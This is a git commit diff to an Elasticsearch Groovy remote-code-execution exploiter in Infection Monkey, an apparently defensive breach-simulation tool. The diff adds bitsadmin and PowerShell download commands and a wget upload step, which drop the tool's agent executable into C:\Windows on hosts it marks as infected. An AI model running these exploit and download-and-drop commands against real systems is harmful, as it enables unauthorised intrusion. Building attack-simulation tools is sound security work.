Commands tested and working on windows.

2018-07-24 15:55:34 +03:00 · 2018-07-24 15:55:34 +03:00 · a54eedec11
parent 7e2cc86ab9
commit a54eedec11
1 changed files with 19 additions and 6 deletions
--- a/infection_monkey/exploit/elasticgroovy.py
+++ b/infection_monkey/exploit/elasticgroovy.py
@ -6,13 +6,14 @@

 import json
 import logging
-
 import requests
-
-from model import DROPPER_ARG
 from network.elasticfinger import ES_SERVICE, ES_PORT
 from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth
 from exploit.web_rce import WebRCE
+from model import WGET_HTTP_UPLOAD, POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED
+
+import copy
+import re

 __author__ = 'danielg'

@ -34,6 +35,10 @@ class ElasticGroovyExploiter(WebRCE):

    DOWNLOAD_TIMEOUT = 300  # copied from rdpgrinder

+    # Both commands are prepared for use in future development
+    RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
+    POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing\\\""
+
    _TARGET_OS_TYPE = ['linux', 'windows']

    def __init__(self, host):
@ -56,14 +61,22 @@ class ElasticGroovyExploiter(WebRCE):
        if not vulnerable_urls:
            return False

-        if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], self._config):
+        # Extra escaping required:
+        config = copy.deepcopy(self._config)
+        config.dropper_target_path_win_32 = r"C:\\\\Windows\\\\monkey32.exe"
+        config.dropper_target_path_win_64 = r"C:\\\\Windows\\\\monkey64.exe"
+
+        if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], config):
            LOG.info("Host %s was already infected under the current configuration, done" % self.host)
            return True

        if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]):
            return False

-        data = WebRCE.upload_monkey(self.host, self._config, exploiter, vulnerable_urls[0])
+        commands = {'windows': self.RDP_CMDLINE_HTTP,
+                    'linux': WGET_HTTP_UPLOAD}
+
+        data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0], commands)

        # We can't use 'if not' because response may be ''
        if data is not False and data['response'] == False:
@ -81,7 +94,7 @@ class ElasticGroovyExploiter(WebRCE):
        payload = self.JAVA_CMD % command
        response = requests.get(url, data=payload)
        result = self.get_results(response)
-        if not result:  # not vulnerable
+        if not result:
            return False
        return result[0]